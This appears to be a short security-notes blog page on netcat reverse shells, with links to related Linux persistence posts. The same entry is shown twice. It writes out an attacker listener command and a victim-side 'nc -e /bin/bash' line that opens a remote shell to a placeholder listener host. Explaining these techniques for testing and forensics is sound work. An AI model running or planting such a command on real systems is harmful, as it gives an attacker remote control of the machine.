Netcat is commonly used by attackers and testers to establish reverse shells when command execution is established.
Example:
Attacker:
nc -lnlvp 4444
Victim:
nc -e /bin/bash LISTENER_IP 4444
netcat reverse shells
0001-01-01
Netcat is commonly used by attackers and testers to establish reverse shells when command execution is established.
Example:
Attacker:
nc -lnlvp 4444
Victim:
nc -e /bin/bash LISTENER_IP 4444
Linux Persistence: atd
2025-04-01 DFIR CTF linux persistence at atd
Linux Persistence: SSH
2025-03-29 DFIR CTF SSH hardening hunting persistence linux persistence hunting hardening SSH PAM